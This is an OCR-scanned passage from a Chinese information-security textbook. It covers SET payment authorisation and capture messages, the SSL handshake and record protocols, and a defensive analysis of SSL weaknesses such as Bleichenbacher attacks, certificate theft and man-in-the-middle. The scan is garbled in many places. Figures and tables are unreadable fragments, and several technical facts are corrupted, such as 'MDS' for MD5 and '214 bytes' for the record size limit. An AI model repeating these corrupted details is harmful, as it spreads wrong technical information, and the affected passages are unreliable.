验证 PI 双重 签名 ， 即 用 持 卡 人 签名 公 钥 解密 双重 签名 ， 计 算 PI 的 消息 摘要 ， 与 

包含 在 PI 中 OI 摘要 一 起 计算 Hash 值 ， 与 解密 后 的 双重 签名 对 比 ; 

。 验证 Numl 和 PI 中 的 识别 号 ; 

。 将 授权 请 求 通过 银行 网 络 发 向 发 卡 行 ; 

。 生成 并 数字 签名 授权 响应 消息 ; 

© 产生 Deskey8 加 密 授 权 响 应 ;用 商家 的 密 钥 交换 公 钥 加 密 Deskey8 得 到 商家 信封 ; 

。 产生 Deskey9 加 密 请 款 标 记 ， 用 支付 网 关 的 密 钥 交 换 公 钥 加 密 Deskey9 生成 网 关 
信封 ; 
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。 将 〈( 加 密 后 授权 响应 和 商家 信封 ) 十 〈 加 密 后 请 款 标 记 和 网 关 信封 ) + 支付 网 关 
签名 证 书 ) 一 起 发 送 商家 。 

商家 收 到 后 : 

。 验证 支付 网 关 证 书 ; 

。 用 商家 的 密 钥 交换 私 钥 解 开 数 字 信 封 得 到 Deskey8, H Deskey8 解密 授权 响应 ; 

。 验证 支付 网 关 对 授权 响应 的 数字 签名 ; 

。 保存 授权 响应 、 加 密 后 的 扣 款 令 牌 和 请 款 标 志 ， 用 于 以 后 扣 款 处 理 。 至 此 ， 商 家 
完成 持 卡 人 的 购物 处 理 。 

© 支付 请 款 (Payment Capture) 

。 商家 产生 并 数字 签名 一 个 请 款 请 求 (Capture Request); 

。 产生 Deskeyl0 加 密 扣 款 诸 求 ， 用 支付 网 关 密 钥 交 换 公 钥 加 密 Deskeyl0 生成 支付 
信封 ; 

。 将 (( 加 密 后 扣 款 请 求 和 支付 信封 十 (加 密 后 扣 款 令 牌 和 网 关 信封 )) 发 向 支付 
网 关 。 

支付 网 关 收 到 扣 款 请 求 后 : 

。 用 支付 网 关 密 钥 交 换 私 钥 解 密 支付 信封 得 到 Deskeyl0; 用 Deskeyl0 解密 扣 球 

请 求 ; 

验证 扣 款 请 求 的 商家 签名 ; 

。 用 支付 网 关 密 钥 交换 私 钥 解密 Deskey9， 再 用 Deskey9 解密 请 款 标记 ; 

。 比较 扣 款 请 求 和 请 款 标记 ; 

。 将 扣 球 请 求 通过 银行 网 络 发 送 到 发 卡 行 ; 

生成 并 数字 签名 扣 款 响应 消息 ; 

。 产生 Deskeyll 加 密 扣 款 响应 ;用 商家 的 密 钥 交换 公 钥 加 密 Deskeyll 生成 商家 信封 ; 

。 将 〈( 加 密 扣 款 响应 和 商家 信封 ) 十 网 关 的 签名 证 书 ) 一 起 传 给 商家 。 

商家 收 到 支付 网 关 传 来 的 扣 款 响应 后 : 

。 用 商家 私 钥 解密 Deskeyll， 用 Deksyll 解密 扣 款 响应 ; 

。 验证 网 关 证 书 ; 

。 验证 支付 网 关 的 签名 ; 

。 商家 保存 扣 款 响应 ， 用 于 与 收 单行 得 到 的 付款 进行 对 账 。 


5.2.3.2 SSL 协议 


1. SSL 协议 概述 
SSL (Secure Sockets Layer) 安全 套 接 层 协 议 是 Netscape 公司 于 1994 年 推出 的 一 种 


安全 通信 协议 。 在 SSL 中 ,采用 了 公开 密 钥 和 私有 密 钥 两 种 加 密 方 式 ， 它 对 计算 机 之 间 
整个 会 话 进行 加 密 ， 从 而 保证 了 安全 传输 。SSL 的 安全 服务 位 于 TCP 和 应 用 层 之 间 ， 可 


为 应 用 


层 (如 : HTTP、FTP、SMTP) 提供 安全 业务 ， 服 务 对 象 主要 是 Web 应 用 ， 即 客 
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户 浏览 器 和 服务 器 。 它 现 已 成 为 保密 通信 的 工业 标准 ， 目 前 使 用 的 版 本 为 3.0 版 本 。 

SSL 服务 器 认证 允许 用 户 确认 服务 器 身份 。 支持 SSL 协议 的 客户 机 软件 能 使 用 公 钥 
密码 标准 技术 (如 用 RSA 和 DSS 等) 检查 服务 器 证 书 、 公 用 ID 是 否 有 效 和 是 否 由 在 客 
户 信 任 的 认证 机 构 CA 列表 内 的 认证 机 构 发 放 。 

SSL 客户 机 认证 允许 服务 器 确认 用 户 身 份 。 使 用 应 用 于 服务 器 认证 同样 的 技术 ， 支 
持 SSL 协议 的 服务 器 软件 能 检查 客户 证 书 、 公 用 ID 是 否 有 效 和 是 否 由 在 服务 器 信任 的 
认证 机 构 列表 内 的 认证 机 构 发 放 。 

一 个 加 密 的 SSL 连接 要 求 所 有 在 客户 机 与 服务 器 之 间 发 送 的 信息 由 发 送 方 软件 加 
密 和 由 接受 方 软件 解密 ， 对 称 加 密 法 用 于 数据 加 密 ( 如 用 DES 和 RC4 等 )， 从 而 连接 是 
保密 的 。 所 有 通过 加 密 SSL 连接 发 送 的 数据 都 被 一 种 检测 算 改 的 机 制 所 保护 ， 使 用 消息 
认证 码 (MAC) 的 消息 完整 性 检查 、 安 全 散 列 函数 (如 SHA 和 MDS 等 ) 用 于 消息 认证 
码 计 算 ， 这 种 机 制 自动 地 决定 传输 中 的 数据 是 否 已 经 被 更 改 ， 从 而 连接 是 可 靠 的 。 

SSL 主要 工作 流程 包括 : 网 络 连 接 建立 ; 与 该 连接 相关 的 加 密 方 式 和 压缩 方式 选择 ; 
双方 的 身份 识别 ， 本 次 传输 密 钥 的 确定 ， 加 密 的 数据 传输 ， 网 络 连 接 的 关闭 。 

应 用 数据 的 传输 过 程 为 : 

© 应 用 程序 把 应 用 数据 提交 给 本 地 的 SSL; 

© 发 送 方 根据 需要 ， 使 用 指定 的 压缩 算法 ， 压 缩 应 用 数据 ; 

@ 发 送 方 使 用 散 列 算法 对 压缩 后 的 数据 进行 散 列 ， 得 到 数据 的 散 列 值 ; 

© 发 送 方 把 散 列 值 和 压缩 后 的 应 用 数据 一 起 用 加 密 算法 加 密 ; 

密 文通 过 网 络 传 给 对 方 ; 

O 接收 方 用 相同 的 加 密 算 法 对 密 文 解密 ， 得 到 明文 ; 

@ 接收 方 用 相同 的 散 列 算法 对 明文 中 的 应 用 数据 散 列 ; 

@ 计算 得 到 的 散 列 值 与 明文 中 的 散 列 值 比 较 ; 

如 果 一 致 ， 则 明文 有 效 ， 接 收 方 的 SSL 把 明文 解压 后 得 到 应 用 数据 上 交 给 接收 方 的 
应 用 。 和 否则 就 丢弃 数据 ， 并 向 发 送 方 发 出 报警 信息 。 严 重 的 错误 有 可 能 引起 再 次 的 协商 
或 连接 中 断 。 

SSL 是 一 个 两 层 协议 , 包括 SSL 握手 层 协议 和 SSL 记录 层 协议 。SSL 握手 层 有 SSL 
握手 协议 (SSL Handshake Protocol), SSL 更 改 密码 说 明 协议 (SSL Change Cipher Spec 
Protocol). SSL 报警 协议 (SSL Alert Protocol); SSL 记录 层 有 SSL 记录 协议 (SSL Record 
Protocol)， 它 为 更 高 层 提供 基于 客户 /服务 器 模式 的 安全 传输 服务 。 

SSL 协议 提供 的 服务 可 以 归纳 为 如 下 三 个 方面 : 

CL) 用 户 和 服务 器 的 合法 性 认证 

使 得 用 户 和 服务 器 能 够 确信 数据 将 被 发 送 到 正确 的 客户 机 和 服务 器 上 。 客 户 机 和 服 
务 器 都 有 各 自 的 识别 号 ， 由 公开 密 钥 编排 。 为 了 验证 用 户 ，SSL 协议 要 求 在 握手 交换 数 
据 中 做 数字 认证 ， 以 此 来 确保 用 户 的 合法 性 。 


EJ 
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(2) 加 密 数 据 以 隐藏 被 传送 的 数据 

SSL 协议 采用 的 加 密 技术 既 有 对 称 密 钥 ， 也 有 公开 密 钥 。 具 体 来 说 ， 就 是 客户 机 与 
服务 器 交换 数据 之 前 , 先 交换 SSL 初始 握手 信息 。 在 SSL 握手 信息 中 采用 了 各 种 加 密 技 
术 ， 以 保证 其 机 密 性 和 数据 的 完整 性 ， 并 且 经 数字 证 书 鉴别 。 这 样 就 可 以 防止 非法 用 户 
破译 。 

(3) 维护 数据 的 完整 性 

SSL 协议 采用 Hash 函数 和 机 密 共享 的 方法 ， 提 供 完整 信 息 性 的 服务 ， 来 建立 客户 
机 与 服务 器 之 间 的 安全 通道 ， 使 所 有 经 过 SSL 协议 处 理 的 业务 在 传输 过 程 中 都 能 完整 、 
准确 无 误 地 到 达 目 的 地 。 

2. SSL 握手 和 记录 协议 

(1) SSL 握手 协议 

SSL 握手 协议 被 封装 在 记录 协议 中 ， 该 协议 允许 服务 器 与 客户 机 在 应 用 程序 传输 和 
接收 数据 之 前 互相 认证 、 协 商 加 密 算法 和 密 钥 。 在 初次 建立 SSL 连接 时 服务 器 与 客户 机 
交换 一 系列 消息 。 

这 些 消 息 交 换 能 够 实现 如 下 操作 : 

© 客户 机 认证 服务 器 ; 

@ 允许 客户 机 与 服务 器 选择 双方 都 支持 的 密码 算法 ; 

@ 可 选择 的 服务 器 认证 客户 ; 

@ 使 用 公 钥 加 密 技术 生成 共享 密 钥 ; 

© 建立 加 密 SSL 连接 。 

SSL 握手 协议 报 文 头 包括 三 个 字段 : 

O 类 型 (1 字 节 ): 该 字段 指明 使 用 的 SSL 握手 协议 报 文 类 型 。SSL 握手 协议 报 文 
包括 10 种 类 型 。 报 文 类 型 见 图 5-7。 

@ KE GFW: 以 字 节 为 单位 的 报 文 长 度 。 

© AF Cl 字 节 ): 使 用 的 报 文 的 有 关 参 数 。 

报 文 类 型 参数 

hello_request 室 

client hello 版 本 、 随 机 数 、 会 话 ID、 密 文 族 、 压 缩 方法 


server_hello 版 本 、 随 机 数 、 会 话 IDP、 密 文 族 、 压 缩 方 法 
certificate X.509v3 证 书 链 


server_key_exchange BR. EA 
certificate_request 类 型 、 授 权 
server_done 室 
certificate_verify 签名 
client_key_exchange BR. EZ 
finished Hash 值 


图 5-7 SSL 握手 协议 报 文 
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当 一 SSL 客户 和 服务 器 首次 开始 通信 时 ， 它 们 就 协议 版 本 、 加 密 算法 的 选择 、 是 否 
验证 对 方 及 公 钥 加 密 技 术 的 应 用 进行 协商 以 产生 共享 的 秘密 ， 这 一 处 理 是 由 握手 协议 完 
成 的 ， 握 手 过 程 如 图 5-8 所 示 。 


客户 服务 器 


— Bia. SID. Et 
(1) —— W ERDE TAMNA 


(2) 一 可 选 的 发 送 服务 器 证 书 、 请 求 


Maaa SPIE 
t 
(3) — by r 和 加 果 请 求 的 话 ,客户 发 送 证 书 


4) oS : 
change cipher spec 修改 宝 立 雍 并 结束 握手 协议 


注 : 带 * 的 传输 是 可 选 的 ， 或 者 与 站 点 相关 的 ， 并 不 总 是 发 送 的 报 文 。 
图 5-8 ”握手 协议 的 过 程 


建立 安全 能 力 

客户 机 向 服务 器 发 送 client_hello 报 文 ， 服 务 器 向 客户 机 回应 server_hello 报 文 ， 建 
立 如 下 的 安全 属性 : 协议 版 本 、 会 话 ID、 密 文 族 、 压 缩 方 法 ， 同 时 生成 并 交换 用 于 防止 
重 放 攻 击 的 随机 数 。 密 文 族 参 数 包括 密 钥 交换 方法 (Deffie-Hellman 密 钥 交换 算法 、 基 
于 RSA 的 密 钥 交换 和 另 一 种 实现 在 Fortezza chip 上 的 密 钥 交换 )、 加 密 算法 (DES、RC4、 
RC2、3DES 等 )、MAC 算法 (MDS 或 SHA-1)、 加 密 类 型 〈 流 或 分 组 ) 等 内 容 。 

认证 服务 器 和 密 钥 交换 

在 hello 报 文 之 后 ， 如 果 服 务 器 需要 被 认证 ， 服 务 器 将 发 送 其 证 书 。 如 果 需 要 ， 服 
务 器 还 要 发 送 server key exchange。 然 后 ， 服 务 器 可 以 向 客户 发 送 certificate_ request 请 
求证 书 。 服 务 器 总 是 发 送 server_hello_done 报 文 ， 指 示 服 务 器 的 hello 阶段 结束 。 


EIo 


BA 


信息 安全 工程 师 教 程 


认证 客户 和 密 钥 交 换 

客户 一 旦 收 到 服务 器 的 server_hello_done 报 文 , 客户 将 检查 服务 器 证 书 的 合法 性 (如 
果 服 务 器 要 求 )， 如 果 服 务 器 向 客户 请 求 了 证 书 ， 客 户 必 须发 送 客户 证 书 ， 然 后 发 送 
client key_exchange 报 文 , 报 文 的 内 容 依赖 于 client hello 与 server_ hello 定义 的 密 钥 交换 
的 类 型 。 最 后 ， 客 户 可 能 发 送 client verify 报 文 来 校 验 客户 发 送 的 证 书 ， 这 个 报 文 只 能 
在 具有 签名 作用 的 客户 证 书 之 后 发 送 。 

结束 

客户 发 送 change_cipher_spec 报 文 并 将 挂 起 的 CipherSpec 复制 到 当前 的 CipherSpec。 
这 个 报 文 使 用 的 是 改变 密码 格式 协议 。 然 后 ， 客 户 在 新 的 算法 、 对 称 密 铀 和 MAC 秘密 
之 下 立即 发 送 finished 报 文 。finished 报 文 验证 密 钥 交 换 和 鉴别 过 程 是 成 功 的 。 服 务 器 对 
这 两 个 报 文 响应 ， 发 送 自己 的 change_cipher_spec 报 文 、finished 报 文 。 握 手 结束 ， 客 户 
与 服务 器 可 以 发 送 应 用 层 数据 了 。 

当 客 户 从 服务 器 端 传送 的 证 书 中 获得 相关 信息 时 ， 需 要 检查 以 下 内 容 来 完成 对 服务 
器 的 认证 : 时 间 是 否 在 证 书 的 合法 期 限 内 ， 签发 证 书 的 机 关 是 否 是 客户 端 信任 的 ; 签发 
证 书 的 公 钥 是 否 符合 签发 者 的 数字 签名 ; 证书 中 的 服务 器 域名 是 否 符合 服务 器 自己 真正 
的 域名 。 服 务 器 被 验证 成 功 后 ， 客 户 继续 进行 握手 过 程 。 

同样 的 ， 服 务 器 从 客户 传送 的 证 书 中 获得 相关 信息 认证 客户 的 身份 ， 需 要 检查 : 用 
户 的 公 钥 是 否 符合 用 户 的 数字 签名 ; 时间 是 否 在 证 书 的 合法 期 限 内 ; 签发 证 书 的 机 关 是 
否 是 服务 器 信任 的 ; 用 户 的 证 书 是 否 被 列 在 服务 器 的 LDAP(Lightweight Directory Access 
Protocol， 轻 量 级 目录 访问 协议 ) 里 用 户 的 信息 中 ; 得 到 验证 的 用 户 是 否 仍 然 有 权限 访问 
请 求 服务 器 资源 。 

(2) SSL 记录 协议 

SSL 记录 协议 为 SSL 连接 提供 两 种 服务 : 机 密 性 和 报 文 完 整 性 。 

在 SSL 协议 中 ， 所 有 的 传输 数据 都 被 封装 在 记录 中 。 记 录 是 由 记录 头 和 长 度 不 为 0 
的 记录 数据 组 成 的 .所 有 的 SSL 通信 都 使 用 SSL 记录 层 , 记录 协议 封装 上 层 的 握手 协议 、 
报警 协议 、 更 改 密码 说 明 协议 和 应 用 数据 协议 。SSL 记录 协议 包括 了 记录 头 和 记录 数据 
格式 的 规定 。 

SSL 记录 协议 位 于 SSL 协议 的 底层 ， 用 于 定义 传输 数据 的 格式 ， 加 密 /解密 、 压 缩 / 
解压 缩 、MAC 计算 等 操作 。SSL 记录 协议 将 高 层 的 协议 数据 分 成 较 小 的 单元 ， 并 对 它 
进行 压缩 、 附 加 消息 认证 码 MAC、 加 密 、 附 加 SSL 记录 头 ， 然 后 通过 低层 的 传输 层 协 
议 发 送 ， 其 过 程 如 图 5-9 所 示 。 接 收 消息 的 过 程 正好 与 发 送 消息 的 过 程 相反 ， 即 解密 、 
验证 、 解 压 、 拼 装 ， 然 后 送 给 高 层 协议 。 

O 分 段 : 把 上 层 传送 来 的 数据 信息 块 切 分 为 小 于 或 等 于 214 字 节 的 SSL 明文 记录 。 
记录 中 包含 类 型 、 版 本 号 、 长 度 和 数据 字段 。 
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ae ge WW An Ba 
(2) 压缩 ZZ 

(3) 增加 MAC ZZ 

(4) 加 密 


(5) 增加 SSL 记 录 


图 5-9 SSL 记录 协议 发 送 消息 的 过 程 


© 压缩 : 使 用 当前 会 话 状 态 中 定义 的 压缩 算法 对 被 切 分 后 的 记录 块 进行 压缩 。 压 
缩 算法 将 SSL 明文 记录 转化 为 SSL 压缩 记录 。 压 缩 是 可 选 的 ， 且 必须 是 无 损 压 缩 ， 且 对 
原文 长 度 的 增加 不 能 超过 1024 字 节 。 

®© 增加 MAC: 在 压缩 数据 上 计算 消息 认证 MAC。 所 有 的 记录 均 采 用 在 当前 的 加 
密约 定 中 定义 的 加 密 算法 和 报 文 验证 MAC 算法 加 以 保护 。 当 握手 结束 后 ， 参 与 双方 共 
享 一 个 用 于 加 密 记 录 和 计算 消息 认证 码 MAC 的 公开 密 钥 。 

@ 加 密 : 对 压缩 数据 及 MAC 进行 加 密 。 加 密 和 消息 认证 码 (MAC) 函数 将 一 SSL 
压缩 记录 加 密 转 换 为 一 SSL 密 文 记录 。 传 输 时 将 包含 一 序列 号 ， 这 样 即使 包 丢 失 、 被 改 
变 或 包 被 重复 收 到 时 也 可 以 及 时 发 现 。 

© 增加 SSL 记录 头 。 

SSL 记录 头 : 由 5 个 字 节 组 成 , 第 一 个 字 节 说 明 使 用 SSL 记录 协议 的 高 层 协议 类 型 ， 
如 : 20 表示 更 改 密码 说 明 协 议 、21 表示 报警 协议 、22 表示 握手 协议 、23 表示 应 用 数据 
协议 ; 第 二 个 字 节 表示 主要 版 本 号 ， 如: 对 于 SSLv3.0,， 值 为 3; 第 三 个 字 节 表示 次 要 版 
本 号 ， 如 : 对 于 SSLv3.0， 值 为 0; 第 四 、 第 五 个 字 节 表示 明文 数据 (如 果 选 用 压缩 则 是 
压缩 数据 ) 的 长 度 。 如 图 5-10 所 示 。 

内 容 类 型 主要 版 本 次 要 版 本 压缩 长 度 


| 明文 〈 压 缩 可 选 ) 
| MAC (0，16 或 20 位 ) | 


图 $-10 SSL 记录 协议 字段 


从 上 层 传 来 的 信息 进行 分 组 形成 不 超过 规定 长 度 的 明文 数据 ， 填 充 到 数据 结构 
SSLPlaintext 中 ， 针 对 每 一 个 明文 数据 结构 ， 采 用 事先 协商 好 握手 协议 ) 的 压缩 算法 
进行 压缩 。 压 缩 好 的 数据 将 利用 在 握手 协议 中 协商 好 的 加 密 算法 和 MAC 算法 进行 加 密 


Ba 
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和 保护 ， 最 终 形成 SSLCiphertext 密 文 数据 结构 进行 传输 。 

(3) SSL 协议 安全 性 分 析 

@ 安全 机 制 分 析 

SSL 协议 可 以 被 用 来 建立 一 个 在 客户 和 服务 器 之 间 安 全 的 TCP 连接 。 它 可 以 鉴别 服 
务 器 (有 选择 地 鉴别 客户 )、 执 行 密 钥 交 换 、 提 供 消 息 鉴别 、 提 供 在 TCP 协议 之 上 的 任 
意 应 用 协议 数据 的 完整 性 和 机 密 性 服务 。 其 安全 机 制 包括 以 下 几 个 方面 。 

鉴别 机 制 

SSL 协议 通过 使 用 公开 密 钥 技术 和 数字 证 书 可 以 实现 客户 端 和 服务 器 端的 身份 鉴 
别 。 采 用 SSL 协议 建立 会 话 时 ， 客 户 端 (也 是 TCP 的 客户 端 ) 在 TCP 连接 建立 之 后 
发 出 一 个 client hello 发 起 握手 , 这 个 消息 里 面包 含 了 自己 可 实现 的 算法 列表 和 其 他 一 些 
需要 的 消息 。SSL 的 服务 器 端 会 回应 一 个 server_hello， 里 面 确 定 了 这 次 通信 所 需要 的 算 
法 ， 然 后 发 过 去 自己 的 证 书 〈 里 面包 含 了 身份 和 自己 的 公 钥 )。 默 认 情况 下 ， 客 户 端 可 以 
根据 该 证 书 的 相关 内 容 对 其 认证 链 路 进行 确认 ， 最 终 实现 对 服务 器 端 身份 的 鉴别 ， 同 样 
在 需要 时 也 可 以 采用 类 似 的 方法 对 客户 端 进行 身份 鉴别 。 

加 密 机 制 

混合 密码 体制 的 使 用 提供 了 会 话 和 数据 传输 的 加 密 性 保护 。 在 进行 SSL 握手 过 程 
中 ， 双 方 使 用 非 对 称 密码 体制 协商 出 本 次 将 要 使 用 的 会 话 密 钥 ， 并 选择 一 种 对 称 加 密 算 
法 ， 并 应 用 于 此 后 数据 传输 的 机 密 性 保护 。 其 中 非 对 称 密码 体制 的 使 用 保证 了 会 话 密 钥 
协商 过 程 的 安全 ， 而 对 称 加 密 算法 的 使 用 可 以 克服 非 对 称 加 密 的 速度 缺陷 ， 提 高 数据 交 
换 的 时 效 性 。 另 外 ， 由 于 SSL 使 用 的 加 密 算法 和 会 话 密 钥 可 适时 变更 ， 如 果 某 种 算法 被 
新 的 网 络 攻 击 方法 识破 ， 它 只 要 选择 另外 的 算法 就 可 以 了 。 

完整 性 机 制 

SSL 握手 协议 还 定义 了 共享 的 、 可 以 用 来 形成 消息 认证 码 MAC (Message 
Authentication Code) 的 密 钥 。SSL 在 对 所 传输 的 数据 进行 分 片 压 缩 后 ， 使 用 单 向 散 列 函 
数 Cul MDS, SHA-1 等 ) 产生 一 个 MAC， 加 密 后 置 于 数据 包 的 后 部 ， 并 且 再 一 次 和 数 
据 一 起 被 加 密 ， 然 后 加 上 SSL 首部 进行 网 络 传输 。 这 样 ， 如 果 数 据 被 修改 ， 其 散 列 值 就 
无 法 和 原来 的 MAC 相 匹 配 ， 从 而 保证 了 数据 的 完整 性 。 

抗 重 放 攻 击 

SSL 使 用 序列 号 来 保护 通信 方 免 受 报 文 重 放 攻击 。 这 个 序列 号 被 加 密 后 作为 数据 包 
的 负载 ， 在 整个 SSL 握手 中 ,都 有 一 个 唯一 的 随机 数 来 标记 这 个 SSL HEF, 这样 重 放 便 
无 机 可 乘 了 。 序 列 号 还 可 以 防止 攻击 者 记录 数据 包 并 以 不 同 的 次 序 发 送 。 

@ 脆弱 性 分 析 

SSL 协议 是 为 解决 数据 传输 的 安全 问题 而 设计 的 ， 实 践 也 证 明了 它 针 对 窃听 和 其 他 
的 被 动 攻击 相当 有 效 ， 但 是 由 于 协议 本 身 的 一 些 缺 陷 以 及 在 使 用 过 程 中 的 不 规范 行为 ， 
SSL 协议 仍然 存在 不 可 忽略 的 安全 脆弱 性 。 
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SSL 协议 自身 的 缺陷 

客户 端 假冒 。 因 为 SSL 协议 设计 初衷 是 对 Web 站 点 及 网 上 交易 进行 安全 性 保护 ， 
使 消费 者 明白 正在 和 谁 进行 交易 要 比 使 商家 知道 谁 正在 付费 更 为 重要 ， 为 了 不 致 于 由 于 
安全 协议 的 使 用 而 导致 网 络 性 能 大 幅 下 降 ，SSL 协议 并 不 是 默认 地 要 求 进 行 客户 鉴别 ， 
这 样 做 虽然 有 悖 于 安全 策略 ， 但 却 促进 了 SSL 的 广泛 应 用 。 针 对 这 个 问题 可 在 必要 的 时 
候 配置 SSL 协议 ， 使 其 选择 对 客户 端 进行 认证 鉴别 。 

SSL 协议 无 法 提供 基于 UDP 应 用 的 安全 保护 。SSL 协议 需要 在 握手 之 前 建立 TCP 
连接 ， 因 此 不 能 对 UDP 应 用 进行 保护 。 如 果 要 兼顾 UDP 协议 层 之 上 的 安全 保护 ， 可 以 
KH IP 层 的 安全 解决 方案 。 

SSL 协议 不 能 对 抗 通信 流量 分 析 。 由 于 SSL 只 对 应 用 数据 进行 保护 ， 数 据 包 的 IP 
头 和 TCP 头 仍然 暴露 在 外 ， 通 过 检查 没有 加 密 的 开源 和 目的 地 址 以 及 TCP 端口 号 或 者 
检查 通信 数据 量 ， 一 个 通信 分 析 者 依然 可 以 揭示 哪 一 方 在 使 用 什么 服务 ， 有 时 甚至 揭露 
商业 或 私人 关系 的 秘密 。 然 而 用 户 一 般 都 对 这 个 攻击 不 太 在 意 ， 所 以 SSL 的 研究 者 们 并 
不 打算 去 处 理 此 问题 。 

可 能 受到 针对 基于 公 钥 加 密 标 准 (PKCS) 的 协议 的 自 适应 选择 密 文 攻击 (如 
Bleichenbacher 攻击 )。 由 于 SSL 服务 器 用 一 个 比特 标识 来 回答 每 条 消息 是 不 是 根据 
PKCS#1 正确 地 加 密 和 编码 ， 攻 击 者 可 以 发 送 任 意 数 量 的 随机 消息 给 SSL 服务 器 ， 再 达 
到 选择 密 文 攻击 的 目的 。 最 广泛 采用 的 应 对 措施 就 是 进行 所 有 三 项 检查 而 不 发 送 警 示 ， 
不 正确 时 直接 丢弃 。 

进程 中 的 主 密 钥 泄漏 。 除非 SSL 的 工程 实现 大 部 分 驻 留 在 硬件 中 ， 和 否则 主 密 钥 将 会 
存留 在 主机 的 主 存储 器 中 , 这 就 意味 着 任何 可 以 读 取 SSL 进程 存储 空间 的 攻击 者 都 能 读 
取 主 密 钥 ， 因 此 ， 不 可 能 面 对 掌 握 机 器 管理 特权 的 攻击 者 而 保护 SSL 连接 ， 这 个 问题 要 
依靠 用 户 管理 策略 来 解决 。 

磁盘 上 的 临时 文件 可 能 遭受 攻击 。 对 于 使 用 虚拟 内 存 的 操作 系统 ， 不 可 避免 地 有 些 
敏感 数据 甚至 主 密 钥 都 交换 到 存盘 上 ， 可 采取 内 存 加 锁 和 及 时 删除 磁盘 临时 文件 等 措施 
来 降低 风险 。 

不 规范 应 用 引起 的 问题 

对 证 书 的 攻击 和 窃取 。 类 似 Verisign 之 类 的 公共 CA 机 构 并 不 总 是 可 靠 的 ， 系 统管 
理 员 经 常 犯 的 错误 是 过 于 信任 这 样 的 公共 CA 机 构 。 因 为 对 于 用 户 的 证 书 ， 公 共 CA 机 
构 可 能 不 像 对 网 站 数字 证 书 那样 重视 和 关心 其 准确 性 。 由 于 微软 公司 的 IS 服务 器 提供 
了 “客户 端 证 书 映射 ”功能 ， 用 于 将 客户 端 提 交 证 书 中 的 名 字 映 射 到 NT 系统 的 用 户 账 
号 ， 在 这 种 情况 下 黑客 就 有 可 能 获得 该 主机 的 系统 管理 员 权 限 ! 如 果 黑 客 不 能 利用 上 面 
的 非法 的 证 书 突 破 服务 器 ， 他 们 还 可 以 尝试 暴力 攻击 。 虽 然 暴力 攻击 证 书 比 暴 力 攻 击 口 
令 更 为 困难 ， 但 仍然 是 一 种 攻击 方法 。 要 暴力 攻击 客户 端 鉴别 ， 黑 客 编辑 一 个 可 能 的 用 
户 名 字 列 表 ， 然 后 为 每 一 个 名 字 向 CA 机 构 申 请 证 书 。 每 一 个 证 书 都 用 于 尝试 获取 访问 
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权限 。 用 户 名 的 选择 越 好 ， 其 中 一 个 证 书 被 认可 的 可 能 性 就 越 高 。 暴 力 攻击 证 书 的 方便 
之 处 在 于 它 仅 需要 猜测 一 个 有 效 的 用 户 名 ， 而 不 是 猜测 用 户 名 和 口令 。 除 此 之 外 ， 黑 客 
还 可 能 窃取 有 效 的 证 书 及 相应 的 私有 密 钥 。 最 简单 的 方法 是 利用 特洛伊 森马， 这 种 攻击 


全 系统 的 核心 ， 经 常 保存 在 不 安全 的 地 方 。 对 付 这 种 攻击 的 唯一 有 效 方法 或 许 是 将 证 书 
保存 到 智能 卡 或 令 牌 之 类 的 设备 中 。 

中 间 人 攻击 。 中 间 人 Gman-in-middle) 攻击 是 指 A 和 B 通信 的 同时 ， 有 第 三 方 C 
处 于 信道 的 中 间 ， 可 以 完全 听 到 A 与 B 通信 的 消息 ， 并 可 拦截 、 替 换 和 添加 这 些 消 息 。 
如 果 不 采 取 有 证 书 的 密 钥 交 换算 法 ，A 便 无 法 验证 B 的 公 钥 和 身份 的 真实 性 ， 从 而 C 可 
以 轻易 的 冒充 ， 用 自己 的 密 钥 与 双方 通信 ， 从 而 窃听 到 别人 谈话 的 内 容 。 为 了 防止 中 间 
人 攻击 ， 对 于 所 有 站 点 发 行 的 证 书 ， 客 户 都 最 好 要 用 自己 的 公 钥 来 检查 证 书 的 合法 性 。 
当 客 户 端 收 到 消息 后 ， 使 用 服务 器 以 前 公开 的 公 钥 解密 ， 然 后 比较 解密 后 的 消息 与 他 原 
先 发 给 服务 器 的 消息 ， 如 果 它 们 完全 一 致 ， 就 能 判断 正在 通信 的 服务 器 正 是 客户 端 期 户 
与 之 建立 连接 的 服务 器 。 任 何 一 个 中 间 人 不 会 知道 服务 器 的 私 钥 ， 也 不 能 正确 加 密 客户 
端 检查 的 随机 消息 ， 从 而 达到 防止 中 间 人 攻击 。 当 使 用 交互 式 程序 在 网 上 冲浪 的 用 户 遇 
到 “公司 使 用 未 知 的 CA” 的 提示 信息 时 ， 如 果 无 法 辨认 该 信息 是 真 的 还 是 自己 遭 到 了 
中 间 人 人 攻击， 最 好 能 立刻 终止 该 连接 : 尽量 少 的 信任 自 签发 证 书 ， 因 为 对 于 一 些 机 警 的 
用 户 ， 他 们 可 能 会 把 伪造 的 证 书 变 成 自 签发 证 书 用 来 打消 对 方 的 疑虑 。 

即使 采用 了 有 证 书 的 密 钥 交 换算 法 ， 攻 击 者 还 可 以 从 与 服务 器 握手 过 程 中 获得 一 些 
内 容 ， 用 于 伪造 一 个 与 服务 器 非常 相似 的 证 书 〈 如 证 书 发 行者 的 OU 域 比 真 证 书 多 一 个 
空格 等 )， 这 样 ， 当 攻击 者 以 中 间 人 的 形式 与 用 户 进行 连接 时 ， 虽 然 客户 程序 能 够 识别 并 
提出 警告 ， 但 仍然 有 相当 多 的 用 户 被 迷惑 而 遭 到 攻击 。 只 要 用 户 有 一 定 的 警惕 性 ， 是 可 
以 避免 这 种 攻击 的 。 

安全 盲点 。 系 统管 理 员 不 能 使 用 现 有 的 安全 漏洞 扫描 或 网 络 入 侵 检 测 系统 来 审查 或 
监控 网 络 上 的 SSL 交易 。 网 络 入 侵 检 测 系统 是 通过 监测 网 络 传输 来 找寻 没有 经 过 鉴别 的 
活动 ， 任 何 符合 已 知 的 攻击 模式 或 者 未 经 授权 的 网 络 活动 都 被 标记 起 来 以 供 审计 ， 其 前 
提 是 IDS 必须 能 监视 所 有 的 网 络 流量 信息 , 但 是 SSL 的 加 密 技 术 却 使 得 通过 网 络 传输 的 
信息 无 法 让 IDS 辨认 ， 这 样 ， 既 没有 网 络 监测 系统 又 没有 安全 审查 ， 使 得 最 重要 的 服务 
器 反而 成 为 受到 最 少 防护 的 服务 器 。 对 此 ， 亚 意 代码 检测 、 增 强 的 日 志 功 能 等 基于 主机 
的 安全 策略 会 成 为 最 后 防线 。 

正 浏览 器 的 SSL 身份 鉴别 缺陷 。 通常 情况 下 , 用 户 在 鉴别 对 方 身份 时 根据 证 书 链 对 
证 书 逐 级 验证 ， 如 果 存 在 中 间 CA， 还 应 检查 所 有 中 间 证 书 是 否 拥 有 合法 的 CA Basic 
